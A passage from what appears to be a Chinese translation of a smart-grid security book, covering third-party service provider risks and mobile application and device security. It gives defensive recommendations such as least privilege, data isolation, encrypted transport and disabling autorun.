容易对一个或者几个,可预知的或是常见用户ID 和密码造成暴力认证攻击。另一 方面,存在一个漏洞,可以导致对一个应用程序未授权的访问,使得可以未授权访 问所有应用程序。可能有人会有使用弱密码的想法,但是希望单点登录的最低密 码要求是配置成能使暴力认证攻击导致的危害很小。 在 Hohm 和 PowerMeter 中,单点登录意味着那些使用Microsoft Live或其他 Google 应用程序的应用,其所有公开记录以及私下利用的漏洞可能马上就变成用 户的问题了。反过来也成立,Hohm 和 PowerMeter 的漏洞可能马上转化为对用 户 e-mail 、RSS源、投资以及其他财务数据、应用程序的未授权访问。 2)持久性身份认证 设想一下以下的普通场景:你下班回家启动家里的PC, 打开你喜欢的Web 浏 览器,它会自动地检查最新的e-mail 。但是没有新的消息,因为你已经在手机上查 看过了。第二天在上班时换了一台新电脑——大概是因为原来的台式机被在午休 时下载的几百个视频感染了三个以上不同的病毒——你马上连接并且登陆到微软 Live 和/或 Google 账户来确保你能访问e-mail 、RSS源、股票行情还有其他提供给 用户的多种工具。接着你用 Ford SYNC买了一辆新车,能够提供无线热点[5]并重 复同样的过程。现在你可以任意时间物理连接这些设备,你可以访问自己在线的 所有数据。可以想象一下穿戴式和嵌入式系统最终广泛实现时,将不再需要手持 设备就可访问。要使这种情况成真,除了明显要求的软硬件之外,还需要持久性身份认证,它具有很强大的功能并且很具有诱惑力。现在想象一下,你能在你的家里 远程管理所有电力设备,包括警报系统。 Web 应用程序的持久性身份认证允许用户只要使用账户凭证认证一次,以后 在将来的请求当中只要提供认证令牌作为身份证据即可,这个令牌一直有效直到 被删掉或者过期为止,而这两种情况是在很长一段时间内都不会发生的。从攻击 者的角度来看,获得这个令牌就等同于模拟用户访问相关应用。通过物理和逻辑 手段可以获取对存储该令牌的设备的访问,也能导致同样的结果。 可能 Web 应用程序持久性认证最重要的安全问题是,很多已知以及将来发现 的漏洞都能让攻击者利用一个恶意网站就威胁到持久性身份认证。通过吸引毫无 戒心的用户访问恶意 Web 页面,攻击者能够获得这个令牌或是在自动攻击中利用 它。可以参考这章的“其他攻击形式”。 无论是一个合法用户还是一个攻击者,持久性身份认证之后访问就很容易了。 是否实施归结为用户的接受:如果为了关灯或是重新设定恒温器就要重新输入密 码,那么用户还会使用该应用程序吗(并且不经常抱怨)?如果不能,那么一个精心 策划的攻击者也许就能够使用你办公楼或是附近房子的灯来模拟“玩筷子”游戏, 当然甚至更严重。 3)其他攻击类型 第7章“攻击公用事业公司”描述了对 Web 应用程序用户的两类强大攻击,通 过跨脚本攻击(XSS) 和跨站请求攻击(CSRF), 攻击者可以使用这两种攻击来影响 消费者最终影响公用事业公司。尽管这些攻击是从公用事业公司风险的角度论述 的,其实对任何一个 Web 应用程序以及任何实施和使用它们的单位都是适用的。 对于像从微软和谷歌获取第三方服务的用户,风险几乎全部在于用户,这是因为提 供商除了损失点信誉和短时间的股价跌落,几乎没有别的风险。 9.2.3 智能设备失控 智能设备这个行业的发展是十分分散的,就是说有许多不同的公司在生产产 品并且希望通过在用户中广泛使用而成为标准。尽管不应该再写一遍,但是这就 意味着安全控制与更好更容易的功能和可访问性相比只能退而居其次。人们只能 希望安全还在,而没有被丢弃。但是人们应该希望未来的几年强调安全。所以,读 者应该放心, 一旦一次重大攻击被公众所知,这些单位会认真对待安全并且认为它 是“重中之重”。安全专家也应该放心,随着智能电网行业的不断成熟,他们也会希 望其工作安全。 将智能恒温器作为一个例子。使用户能够远程管理他们的恒温器设置可能会 导致什么出错?用这一章讲的攻击知识想一下这个智能恒温器,并且考虑它的风 险和好处。远程恒温器管理的好处是减少电力的使用并且减少成本。风险是未授 权访问和操作恒温器设置。首先要考虑的是,这个可能看起来不会造成特别重大 的风险。但是如果攻击者能够在一月份的半夜关闭威斯康星州住户的恒温器会发生什么事?想一下会有多少人会生病并且在接下来的一天或者一周中请病假。医 院会变得十分的拥挤,消费者不知不觉大量拨打公用事业公司用户支持电话,整个 这个过程每周都要重新发生,直到有人找到问题的真正原因为止。 一个恒温器的恶作剧只是一件事,但是想一下家里的每一个电力设备都会具 有“智能”功能,当然就意味着通过 Web server 或应用程序的可编程性和远程访 问。对于远程访问安全次要的办公楼和一些公司,攻击者也许能执行相似的攻击。 如果对电力供应、警报系统和物理安全设备设置了相似的智能功能,这些攻击就会 普遍变得轻而易举了。不需要传播太多恐惧、不确定和怀疑,就足以说一个计划好 的攻击事实上能够影响数千或数百万的人和单位。 9.3 攻击服务提供商 任一机构最容易忽视的风险是来自信任的第三方的威胁。机构通常会任由第 三方支配:要么接受提供远程域管理员访问的风险,要么找另一个供应商来支持需 要的服务或是产品。无可否认,域管理员访问可能是夸大的并且并不常见,但是仍 然是普通问题的一个例子: 一个使用第三方服务的机构会选择要不外包处理敏感 信息,要不放松安全防御来进行操作,有些情况下两者都会选择。两种情况下都忽 视的风险在于信任第三方会保护敏感数据,并且不会煽动对购买其服务的机构的 攻击。安全专家了解这点,攻击者也能利用这一点通过第三方提供商来攻击公用 事业公司。 9.4 保护第三方安全访问智能电网 无论什么环境,当谈论到第三方访问你的资源时,最小特权原则都是黄金法 则。限制第三方只能访问有效业务所必需的资源会最小化风险。这个过程的第一 步就是评估这种关系的信任。 9.4.1 信任 安全专家是刻板偏执的。他们在晚上的时候会不睡觉想着他们的机构在遭受 零日漏洞的攻击,大量的僵尸网络正在执行一个分布式的拒绝服务攻击,还有数不 尽的其他原因。所以当机构的业务单元与想要访问敏感资源的第三方合作时,安 全部门马上会回复四个字,这四个字不能在本书中出现。因为公司的其他部门都 是信任安全部门来工作的,所以安全部门必须要小心谨慎。例如, 一个第三方的 CEO(Alice) 是公用事业公司CEO(Bob) 的一个非常亲密的朋友。Alice 和 Bob可 能基于彼此间的相互信任达成协议,但是Bob 在同意 Alice 远程控制智能设备的 Web 应用程序之前没有和他的安全部门协商,所以安全部门没有机会告诉 Bob在 HTTP 上传输凭证是一件很糟糕的事。 安全部门尖叫咒骂 Bob,或是礼貌批评 Alice 的安全行为,可能并不是最好解 决这种情况的最佳办法。用一个好斗的态度对待这些情况只会增加安全部门和公 司其他部分的裂痕,只会使得安全部门的工作更加困难。最好的办法可能就是在 整合过程完成之前向Alice 的公司说明每一个问题。确保 Alice 的公司已经实施 了相似的安全控制,这样可以帮助安全部门处理新信任关系。 当与第三方建立协议时,通常以服务水平协议(Service Level Agreement, SLA) 或是功能要求文档的形式,明确定义协议中的所有安全要求。合同上注明安 全要求,使得第三方在合同上有义务实施这些安全要求。 1)菊花链信任 另一个考虑是第三方业务合作伙伴,可能第三方有坚实的安全管理程序,但是 你相信他们的第三方业务伙伴吗?例如,在写这本书的时候,微软正在限制跟他们 合作的公用事业公司对 Hohm SDK 的访问。另外,微软在他们的在线隐私声明中 表明他们不会出售、出租或是租赁他们的客户列表给第三方,[6]这是值得称赞的。 然而,他们确实又向为微软工作的其他公司提供了信息。[6]理解第三方的隐私策略 以及在合作协议中指明权限是如何授予的,会在很大程度决定信任关系。 此外,第三方很可能有多于一个的客户,你的公司能信任第三方保护你的信息 而不被他们的其他客户知道吗?这个问题会在“评估第三方”和“第三方安全”中详 细阐述。 9.4.2 数据访问 在这一章“计费”部分,描述了使用第三方处理支付卡交易的情景。尤其是,注 意到公用事业公司不需要访问支付卡数据,第三方支付处理程序也应该不需要访 问消费者数据,如能量消耗或是支付历史。对敏感信息的访问应该要审查,同时也 应该链接到要求访问该数据的特定功能上。 提示 第三方会经常要求比他们实际需要的更多的访问。有时候,这个会发生,因为确实 不知道或是没有完全明白他们真正需要访问什么数据。相反,他们也可以要求访 问更多的数据来帮助他们的市场部门。有时候,他们会要求更多的访问是因为他 们预计他们的第一次请求会被你的公司拒绝,然后通过授予比要求更少的权限来 “缓解风险”。无论怎样,你的公司都应该用相同的问题来响应他们的访问请求:为 什么?你应该强制第三方提供请求访问的理由。 1)数据分类 为了能够正确保护访问数据,数据需要被指定分级。不幸的是,这是一个长期 并且困难的过程。第一步是定义危险标签,如下面是常用的标签: (1)机密的 (2)专有的 (3)仅官方使用 (4)向公众发布的 对于标签而言,有个明确的标签定义,能指导员工如何使用分类系统,这比实 际的标签名称更重要。 对某些数据如支付卡数据或是社保号进行分类相对比较容易。大家都知道这 是敏感信息应该被机密保存。遗憾的是,不是所有数据都是这么容易分类的,尤其 是当你考虑数据整合和组合时。 一个十分简单的例子,消费者一个小时的全部能 量消耗可以认为是不敏感的,所以如果你的公司泄露了 Tony Fick今天上午8点 到9点之间使用了2kW, 这不会给 Tony Fick带来很大困扰。但是,如果公布他一 周每小时的能量消耗,可能很快就分析出他每日的时间表,比如,他什么时候起床, 什么时候去上班,以及什么时候下班和睡觉。这样可以让人知道抢劫他的最佳时 间。为了更准确对数据的敏感性分类,评估应该确定只泄露特定数据、 一段时间的 整体数据的风险,以及攻击者是如何组合其他数据来使用这些数据。 2)数据隔离 第三方应该实施数据隔离来阻止他们的客户端访问彼此的数据。第三方服务 提供商会有多个客户端,这些很有可能使用相同的应用程序接口、网关和潜在的数 据存储。如果可能的话,应该避免与其他客户端一起存放数据在相同系统上。尽 管物理隔离是最理想的,但是现在每个机构差不多都使用虚拟化技术。所以,虚拟 和逻辑隔离是最常见的情况。 如果不能数据隔离,你的机构又绝对会与第三方合作,那么你的机构应该评估 一下他们的授权安全控制来缓解风险。强授权安全控制有助于阻止其他机构访问 你的数据。授权安全控制不会完全消除风险,但是这个风险更能接受了。 9.4.3 网络访问 由于业务原因 Business-to-business(B2B) 连接通常不考虑安全就会接受。 在第7章“攻击公用事业公司”中阐述了在 Davis-Besse 核电站发生的事故,概 括来讲就是 Slammer 蠕虫能够感染发电厂的内部系统。虽然发电厂的外部防 火墙会阻挡这个蠕虫,但是承包商与发电厂之间的网络连接是绕过防火墙的, 该网络连接使得蠕虫从承包商的网络传播到发电厂的内部网络。 这只是提 供了一个例子,解释为什么第三方的网络流量应该采取与其他网络流量相同 的安全控制。 注意 B2B连接通常可以绕过外部安全控制,从而导致两个机构之间的连接是未过滤的。如 Davis-Besse 核电站的例子所示,第三方网络的漏洞会影响你的机构的安全态势,反之亦然。从外部的角度看,两个机构之间的 B2B 连接应该受允许通信的端口、协议和系统所限制。 一些第三方供应商要求域凭证来保证其服务和产品的正确运行,为其提供域 管理员访问则实施会变得较容易,但是风险级别也明显增加了。如果攻击者攻破 了其服务,则攻击者就能够执行相同特权的命令。所以,如果服务是以域管理员账 号运行的,攻击者就能够以与管理员的特权来执行命令。如果第三方供应商必需 要域账号,则应该给一个尽可能最小特权的账号是最理想的。另外,应该要求该账 号的使用也是遵守公司密码策略的。 1)隔离 在要求网络访问的大多数情况下,第三方很可能不需要访问整个网络。例如, 一个执行智能电表补丁管理的服务提供商不需要访问人力资源子网或系统。即使 你的机构不需要任何第三方的服务,网络也不应该设计成扁平结构,因为在扁平网 络中任何系统都可以互相访问。应该在防火墙和其他网络设备上设置合适的访问 控制来限制网络与子网之间不必要的访问。限制对特定网络部分的访问能够减少 机构暴露给通过第三方实施攻击的风险。 2)监控 如果你的机构已经实施了安全监控方案,例如入侵防御系统(IPS) 或入侵检测系 统(IDS), 那么对于任何第三方的网络流量,这些监控系统都应该进行分析。如果来 自第三方的普通请求是位于监控系统白名单的,则基本上就会直接允许该第三方的任 何流量通过监控设备而不需要分析。当然,如果负责检查这些监控系统警报的工作人 员在每天早上凌晨2点都持续接收到警报,那么很有可能就是由于这些机构的请求导 致的,那么这些第三方的网络流量就应该视为不可信的,应该进行相应的分析。 9.4.4 安全传输 敏感数据应该一直是加密的,包括在传输过程中。很明显在通过不可信网络 传输数据时该规则很重要,其实通过可信网络传输数据时该规则仍然适用。表 9.1列出了常见的传输数据的明文协议及其相应的更安全的替代协议。用更安全 的协议替代这些明文协议本身没什么奇怪的,可以视为实施的一种简单策略。但 是某些设备在传输过程中加密敏感数据可能会出现问题,加密的计算量大,直接导 致设备的电力消耗增多,这样会大幅度降低设备及其电池寿命。 连接机构网络与第三方网络的一种通用实现方法是实施站到站的虚拟专用 网(VPN), 这样会导致在这两个网络之间传输的所有数据都要被加密。但是,这又是一个圈套。让我们设想一个这样的例子,公用事业公司(FakeUtility) 发送消 费者使用数据到第三方(FakeAnalysisCompany) 进行分析。FakeAnalysisCompa- ny 有一个匿名的FTP 服务器,允许任何人写数据到服务器中,但是限制读数据。 所以,任何人都能上传数据到 FTP 服务器中,但是数据上传后只有第三方能够 访问。这是一种常见的简单的解决方法,客户端可以创建脚本来自动传输数据。 遵循该数据路径,FakeUtility 开始用FTP 在自己的网络中明文传输数据,在离开 自己的网络时利用VPN 加密传输数据。数据是以加密方式传输到 FakeAnalys- isComany 网络的,在到达FakeAnalysisComany 网络之后在再利用他们的VPN 来 解密。在 FakeAnalysisCompany 网络内部,解密后的数据明文传输到其 FTP 服 务器。这种方法降低了在不可信网络中明文传输敏感数据的风险,所以你的机 构可能会接受,但是数据在 FakeUtility 和 FakeAnalysisCompany 内部网络传输时 还是有风险的。 注意 审计会检查系统的明文认证协议,例如 Telnet 和 FTP 。 即使没有使用明文的服 务,审计员还是会当作漏洞报告。或者移除或者关闭明文服务来阻止端口扫描器 和网络漏洞扫描器将其报告为漏洞。 9.4.5 评估第三方 在与第三方达成协议合作之前,你的机构应该评估一下他们的安全态势,这是 因为他们的安全态势会马上影响到你的机构的安全态势。最低的底线是,应该要 求第三方实施你的机构已经实施的安全控制。如果你的机构有一个明确不允许使 用明文协议的策略,那么第三方也不应该允许。 如果可能的话,应该执行一个第三方的安全评估来确定他们会带给你的机构 的风险级别。尽管这个请求并不常被接受,但是并不妨问一下。假设你的机构以 及第三方已经执行了一个保密协议(NDA), 第三方可能会愿意提供最近安全评估 的结果。不过,你应该清楚你拿到的报告可能是第五版,在第一版列出的漏洞已经 被修复,所以在第五版的报告中移除了。 1)SAS 70 审计标准 No.70(Statement on Auditing Standards,SAS 70)的声明常被第三 方服务提供商用来回答其客户关于安全的问题。当向第三方问关于安全的问题 时,不管实际答案是否是如SAS70 所声明的那样,第三方通常都会解释是 SAS 70 那样的。SAS70 可以提供有用的信息来帮助你的机构确保第三方至少实施了一 些安全控制。但是,你要记着 SAS70 是第三方的基本市场工具, 一般就是用来使 你相信第三方有多强大。 一个单独的注册会计师或者会计所就可以实施 SAS 70审计,给出服务机构有 关内部控制的意见。[8]这里要注意的一个很重要的事实是, 一份 SAS 70报告只能提供服务机构内部控制的分析,SAS70 审计不会进行服务机构内部控制与系列相 关标准控制之间的差距分析。[8]所以,还是要由服务机构的客户端来确定SAS 70 报告列举的控制是否涵盖了他们期望的所有安全控制要求。 9.4.6 第三方安全 这一章的主要场景是关于第三方服务提供商带给机构风险,这个机构通常 是公用事业公司。但是,如果第三方没有制定企业安全方案,公用事业公司同样 会给第三方带来一样的(假如没有更多的)风险,第三方也应该将他们的客户端 网络视为不可信的。攻击能够从他们的客户端中产生,他们应该准备防御这种 攻击。 作为第三方,你很可能会有不止一个客户(希望如此),并且有责任对用户相互 之间进行保护。虽然强烈反对他们之间有共享环境,但如果存在则应该实施正确 的安全控制来防止客户端互相访问数据,或是客户端访问彼此的网络。特别是,必 须实施访问控制、数据隔离和授权安全控制来保护客户端安全。 9.5 总结 第三方服务提供商在帮助公用事业公司和用户实现智能电网目标中起到了很 重要的作用。在一些情况下,他们的服务和产品会使智能电网更加安全。但是他 们也可能增加智能电网中每个实体的风险。虽然人员之间的正当关系和业务能够 保证一个可信任的关系,但是还是应该确保有正确的安全控制来保护公用事业公 司、第三方、消费者及涉及的其他实体的安全。 攻击者找到第三方然后试图滥用业务合作伙伴之间的信任。公司网站上的新 闻中经常包含他们的新的合作伙伴,这个很容易识别。有决心的攻击者在直接攻 击目标失败后,可能会转而攻击第三方再达到访问原本目标的目的。 移动应用程序和移动设备 10.1 为什么需要移动应用程序? 手机和其他移动设备在当今社会已经非常流行。2010年2月末,comScore (www.comscore.com) 估计约2.34亿美国人(13岁或13岁以上)是移动设备持有 者。因此,公用事业公司可以利用移动设备提供的便利平台向消费者发布他们的 能耗信息,这种方式是消费者很愿意接受的。另外,移动设备允许消费者快速调整 其能源消耗,使其可以在任何地方更改他们的能源消耗情况。 尽管智能电网的功能使得公用事业公司可以远程诊断和修复电网中的大多数 问题,但还是有一些情况需要工作人员亲自到问题所在地。移动设备使得这些工 作人员在现场诊断和修复问题的时候能够接入公司网络和资源。部分设备可以与 现有的应用程序完美兼容,但有些设备需要专门设计的应用程序来实现访问。 10.2 平台 为拥有最广泛的用户群,移动应用程序开发者必须使其应用程序支持多种平 台。下面的列表包含了一些常用的移动平台: ● 手机(智能和普通) ● 移动互联网设备(Mobile Internet devices,MID) ● 便携式媒体播放器(Portable media players,PMPs) ● 笔记本 ● 上网本 ● 超级移动个人计算机(Ultra mobile personal computers,UMPC) ● 平板电脑 从功能的角度看,由于设备的多样性,为移动平台开发移动程序是很困难的。 应用程序需要在3英寸宽屏幕的智能手机和17英寸宽的笔记本上都正确显示。 同样地,这些平台的安全需求也根据支持这些平台的移动设备的特点各有不同。 10.3 信任 第9章“第三方服务”讨论了公用事业公司和第三方服务提供商之间的信任关 系,本章将讨论应用程序开发商和消费者之间的信任关系。然而,在这种情况下, 当消费者使用移动应用程序的时候,他们需要对其极其信任。很多时候,消费者仅 仅是点击“我同意”按钮并盲目地接受开发商的服务条款。 10.3.1 信任陌生人 你会把你的网上银行密码告诉陌生人吗?如果不,为什么要把你的网上银行 密码暴露给陌生人开发的应用程序呢?不对应用程序的代码进行审查,消费者怎 么能保证他们的信息不会受到威胁?应用程序会为恶意的开发者留一个后门,使 得他们可以远程访问消费者的移动设备,或者是应用程序会向开发者的恶意服务 器发送数据。从智能电网的角度看,你会把你房子的钥匙给陌生人让他可以调节你的恒温器的设置参数,从而影响电费吗?如果不,为什么你会把你家房子里控制 智能设备的密码暴露给陌生人开发的应用程序呢? 信任应用程序, 一般是因为你信任其总公司进行了合理监管,同时信任许多用 户给予的评论。让我们以苹果的 iTunes(www.apple.com/itunes/) 应用商店为 例,不过 Google 的安卓市场(www.android.com/market) 和黑莓的应用世界 (http://na.blackberry.com/eng/services/appworld) 也适用于该例子。大多数消 费者已经逐渐信任苹果通过 iTunes 下载音乐、电影和电视剧。随着 iPhone 、iPod Touch 和 iPad 的巨大成功,开发商已经为这些移动设备开发出数量众多的应用程 序。然而,苹果并不是盲目地让任何一个应用程序都可以在他们的应用商店上发 布。比如,苹果禁止包含色情内容的应用程序,基于这个标准苹果已经拒绝和删除 了很大部分包含色情内容的应用。3]但苹果通过筛选应用程序以阻止恶意程序在 应用商店上发布的力度有多彻底呢?尽管消费者可以放心地认为任何一家正规的 公司都会移除恶意的应用程序,但是毕竟发现一个应用里的色情内容比发现一个 应用里的后门容易多了。对每个应用都进行全面的安全评估太花费时间了,因而 是不现实的。因此问题就从是否存在一个符合要求的应用转变为此应用是否安 全,以及你是否应该信任装在你设备上的新的智能电网移动应用程序。 1)代码签名 代码签名是软件行业用来解决对从因特网下载的应用程序的信任问题的一种 方法。代码签名用数字签名确认应用程序的可靠性和完整性。具体地,应用程序 的作者用他们的私有密钥,或者是签名密钥对可执行程序进行签名,任何该可执行 程序的接收者或者是用作者的公钥或者是用证书认证机构 CA(certificate authori- ty)来验证该签名。理论上,这种方法可以阻止任何人篡改应用,给用户提供可靠 的信任。 注意 数字签名是一种密码转换,用于验证源认证、数据完整性以及签名不可抵赖性。[4] 要了解更多关于数字签名的信息,NIST FIPS PUB186-3 对数字签名的原理进行 了详细的阐述。如果你对数字签名或者是公钥基础设施(public key infrastruc- ture,PKI) 不熟悉,初学者可以在 http://articles.techrepublic.com/5100-10878. 11-5839988.html对 PKI 进行入门学习。 尽管代码签名有助于降低从因特网上下载应用的风险,但风险并没有完全消 除。应该注意到代码签名并不能阻止原开发者向他们的应用程序里插入恶意代 码。另外,用户需要确认开发者保护好了他们的私钥。如果一个第三方获取了开 发者的私钥,那么这个第三方就可以篡改源应用程序并用原开发者的私钥进行数 字签名。 作为代码签名在现实中的一个例子,iPhone 要求所有的应用程序都要被苹果签名。 因此,在开发商的应用能在 iPhone 上运行和在应用商店上发布之前,开发 商需要从苹果获得一份签名证书。在这种场景下,苹果担当了CA 的角色,可以发 布和撤销证书。如果一个应用后来被发现是恶意软件,苹果可以撤销这个开发商 及其应用的签名证书,从而阻止他们的应用进一步传播。另外,苹果可以拒绝为这 个开发商再颁布签名证书,有效地阻止了这个开发商在应用商店上发布更多的恶 意软件。 不过苹果的代码签名技术易受攻击。在2010年 CanSecWest 会议上,Halvar Flake 用 Vincenzo lozzo 和 RalfPhilipp Weinmann发现的一个攻击手段在 Pwn2Own 大赛的第一天攻击了iPhone 。 攻击是通过浏览 iPhone 上的一个恶意网站,强迫 iPhone 暴露其 SMS 数据库。[5 这种攻击手段通过使用定向返回编程技术操纵函数调 用堆栈把正确的代码变成恶意的代码,从而绕过代码签名的安全控制。[5] 10.4 攻击 移动应用程序和设备将成为智能电网中的攻击目标。攻击者一般选取抵抗力 最弱的路线取得他们的目标,移动应用程序恰好是个容易访问的目标。对特定移 动设备如手机和 PMPs 的攻击,在过去是受限的;然而,随着这些设备与社会的融 合度以及连通性的提升,这种情况将会发生很大改变。 10.4.1 为什么攻击手提设备? 移动设备,例如笔记本、上网本和平板电脑, 一般都运行传统的操作系统和应 用程序,并且和它们的非移动变种设备使用相同的连接速度。因此,攻击这些设备 并不会让人感到奇怪。手机、MID 和 PMP 最近才成为攻击者的主要目标。更快 的因特网连接速度和储存在这些设备上的敏感数据促使攻击者把它们视为更好的 攻击目标。 手机过去存储很少的信息,包括姓名和电话号码,这些对攻击者来说价值不 大。PMP 也是同样的道理,PMP 一般存储媒体文件,有时也会有一些用户的个人 信息。然而,这些设备现在已经转变为能执行和笔记本等移动设备相同功能的多 用计算机。下面这个列表包含了一些在移动设备上已有的例子: ● VPN 密钥 ● 企业 e-mail 密码 ● 认证令牌 ● GPS 定位信息 ● 应用程序缓存的敏感数据 另外,大多数手机和 PMP 会与笔记本、台式机等其他设备同步。因此,如果一 个攻击者成功攻击了手机或 PMP, 他们就可以用这个攻破的设备攻击与该设备同 步的系统。6]当用户插入该设备或把它与主机系统无线连接时,该设备就会破坏主 机的操作系统。6考虑一个近期关于沃达丰公司在 HTC Magic 手机预装恶意软件的例子。 当该手机的用户将手机与电脑相连时,该手机就会试图在主机电脑上安 装一个 Mariposa 木马客户端以及一个 Confiker 蠕虫和 Lineage 密码窃取程序。2] 10.4.2 SMS 短信服务(Short Message Service,SMS)的信息一般被认为是无害的文本信 息;然而,通过手机上的 SMS 信息系统可以实施攻击。例如,Charlie Miller 和 Collin Mulliner 在美国2009年的黑帽大会上展示了一种用恶意短信攻击iPhone 的例子。8]通过发送特别编写的短信,攻击者可以获得对 iPhone 的完全控制。[8]另 外,进一步的研究表明其他部分手机也容易受此种类型攻击。[8] 10.4.3 e-mail 如果攻击可以通过SMS 实现,那么也可以通过email 实现。针对移动设备的 e-mail 攻击可能与 SMS 攻击形式差不多;然而,这些攻击也可能采取其他的形式, 例如试图伪造来自公用事业公司的信息以便从目标用户处获得敏感数据的网络钓 鱼攻击。 注意 网络钓鱼攻击的其他变种包括鱼叉式网络钓鱼攻击和网络捕鲸攻击。鱼叉式网络 钓鱼攻击指的是针对特定团体的钓鱼攻击。比如,攻击者首先试图获取某个公用 事业公司的一组 email 地址,然后伪造一封该公司的邮件,以提高他们攻击成功的 可能性。网络捕鲸攻击和鱼叉式网络钓鱼相似,但这种攻击把攻击目标限定为高 管或知名度高的人。 举个例子,如以勒索敲诈某个公司为目的的二维攻击。攻击者首先侵入公司 数据中心内的控制各种不同智能设备(如 HVAC、冷却装置、当然还有公司服务器 的供电设备)的智能电表,然后给公司董事会的每个成员都发送邮件,他们的e-mail 地址都公开列在公司的网站上。邮件里写道如果公司不给攻击者支付5百万美元 (或者其他金额),攻击者就会切断关键任务系统的电源,使温度的度数级别变得不 安全,并且大肆破坏 HVAC 。公司的备用电源可以提供短时间的支持,但董事会 成员会把公司的业务置于此风险中吗? 10.4.4 恶意网站 移动 Web 浏览器会像传统浏览器那样被攻击,因此,在手机上打开通过e-mail 发送来的链接和在台式电脑上一样都不安全。大多数攻击者都会试图创建能有尽 可能多的浏览用户的恶意网站,他们通常最后会选择桌面系统浏览器如 IE 或 Sa- fari 。然而,想要攻击你的移动设备的攻击者肯定会创建能攻击移动 Web 浏览器 的恶意网站。 10.4.5 物理攻击 当讨论对移动设备的威胁时,物理安全威胁经常排在最首要的位置。由于它 们自身的特性,移动设备将会处在围墙、保安和安全监控摄像的保护层之外。因 此,这些保护控制措施将无法为移动设备提供物理安全防护。 对移动设备最主要的物理安全威胁是偷盗。因为可以被转售,移动设备已经 成为小偷们的偷窃目标,不过攻击者也把这些设备作为突破外围安全控制的手段。 举个例子,比如公用事业公司的维修人员,他们一天的大部分时间都在故障现场解 决那些不能远程解决的问题,如一根断掉的电线。维修人员都会随身携带一个带 有 3G 无线上网卡的笔记本,该上网卡可以在蜂窝移动网络内提供因特网服务。 维修人员通过企业 VPN 连接公用事业公司的网络,然后查收 e-mail, 检查可以侦 测电网内故障的传感器网络的情况。当维修人员到达故障电线所在地时,他会把 笔记本留在车内。如果攻击者可以盗取那台还和VPN 连接着的笔记本,那他很可 能已经初步接触到了该公司的内部资源。幸运的是,公司一般都有相应的补偿性 控制措施,可以阻止通过 VPN 对内部网络的不受限访问,但攻击者仍然获得了对 该公司的访问点。 从消费者的角度看,拿即将发行的雪佛兰福特旗舰版移动应用程序为例。目 前面向 iPhone、黑莓和安卓平台以及 Web 接口的移动应用程序正在开发中。[这 些移动应用程序将使雪佛兰福特的用户可以远程控制下列特征: ● 显示充电状态 ● 灵活地选择是“现在充电”还是安排以后充电 ● 显示电池充电量的百分比及总电量 ● 允许用户手动设置电网友好型充电模式使之在用电率低的非高峰时段充电 ● 当需要充电、充电中断和充满电时发送短信或 e-mail 提醒 ● 显示上一次出行和全部行程的每加仑英里数,EV 英里数 ● 远程启动交通工具调节车内温度 ● 打开/锁上车门[9] 这个应用可以让用户把充电时间安排到非高峰时段,以减少消费者在高峰时 段的能源消耗,很符合智能电网的目标。如果攻击者可以盗取该设备,那他们会对 用户造成大的破坏。以一个住在温暖的地方,如佛罗里达的雪佛兰福特的用户为 例。在夏天,停在室外的车子内的温度会达到令人难以忍受的100华氏温度以上。 因此,仅仅是自然因素就会对车子里的物件造成损害。然后考虑这样的情况,攻击 者可以远程启动车子。车子就会调节温度到合适的度数,此时电瓶和气缸会被用 空。攻击者可以通过重复的启动车子耗尽电,直到该移动应用通知攻击者电瓶已 空。或者,攻击者可以只用该应用的打开车门的功能偷走车。 移动设备经常是在没有清除敏感数据的情况下就被回收、被转卖或者被丢弃。 ebay(www.ebay.com) 使得这种交易变得切实可行,但如果信息没有被合理清除,买方就会接触到存储在移动设备上的信息和资源。据最近的一份研究调查,在 eBay上 买的40%的硬件设备包含它们前用户的敏感信息,包括企业和政府机构。2009年, 在从eBay上买的一个硬件设备里发现了美国的一个导弹防空系统的数据。 提示 安全清除闪存的过程和清除传统存储设备的过程不同,很可能需要不同的应 用。[12]或者,对设备存储进行消磁或物理毁坏也可以达到相同的目标。 10.5 移动设备安全 移动应用程序主要支持两种方式的访问:移动网站和安装在移动设备上的客 户端程序。不论哪种情况,移动设备都需要受到保护以阻止对移动应用程序的未 授权访问。传统安全控制措施可以被扩展来保护许多移动设备;然而,移动设备上 出现的新问题需要另外的安全措施解决。 针对移动设备安全,下面列出了一些最好的实践指导和建议: ● US-CERT 网络安全建议 ST06-007:保护手机和 PDAs 应对攻击- www.us-cert.gov/cas/tips/ST06-007.html ● US-CERT 网络安全建议 ST⁰5-017:电子设备的网络安全-www.us- cert.gov/cas/tips/ST05-017.html ● USCERT 网络安全建议 ST04-020:保护便携设备:数据安全-www.us- cert.gov/cas/tips/ST⁰4-020.html ● NIST SP 800-124:手机和 PDA 安全指导-http://csrc.nist.gov/publications/nistpubs/800-124/SP800-124.pdf ● NIST SP 800-101:手机取证指导-http://csrc.nist.gov/publications/nist- pubs/800-101/SP800-101.pdf 10.5.1 传统安全控制措施 大多数移动设备可以使用和非移动设备相同的控制措施,尤其是笔记本和平 板电脑。防火墙、基于主机的 IDS/IPS、反病毒程序和补丁管理程序都可以应用到移动设备上提供基于主机的保护;然而,并不是所有的移动设备都支持这些传统安 全控制措施。因此,需要实现额外的安全控制措施来填补这些空白。 10.5.2 安全同步 某些便携设备,如 PMP 和手机,可以与主机系统进行同步,用户就可以通过管理 接口来管理设备。像先前本章的“为什么攻击手提设备”一节提到的,这些设备可以 被用来攻击主机系统,或者反过来一个被感染的主机系统可以用来攻击移动设备。 为了实现这种攻击,攻击者需要利用用户在将其移动设备连接到主机系统时的自动 操作。在微软的窗口系统中,这种自动操作叫做自动运行或自动播放。当设备插入 或连接到计算机时,自动运行功能会自动启动程序,自动播放功能根据插入到计算机 的媒体类型选择自动播放程序。[]一般来说,在企业环境中这些自动操作应该被禁 用,尤其是考虑到最近 Conficker 和其他恶意软件正是利用的这种功能。[ 关于如何 禁用这些功能,你可以从下面的微软支持文章:http://support.microsoft.com/kb/ 967715获得帮助。其他操作系统也有类似的功能,应该被尽可能禁用。 10.5.3 硬盘加密 敏感数据,如信用卡号码或社会保险号,无论是放在公用事业公司办公楼里的 台式机上还是放在员工每天晚上都带回家的笔记本上,都应该被加密。然而,由于 移动设备超出了大多数办公楼的物理安全防护范围,对移动设备进行全盘加密的 需求就更急迫。不幸的是,并不是每种移动设备都有全盘加密策略。因此, 一些缓 和措施如要求任何敏感数据都存储在加密文件容器内或禁止敏感数据存储到移动 设备如手机上,以助于降低此类风险。 工具 TrueCrypt(www.truecrypt.org) 是一款提供文件加密、分区加密和全盘加密的免 费开源工具。全盘加密只是在 windows 上支持,其他功能在 windows 、Mac OS X 和众多Linux 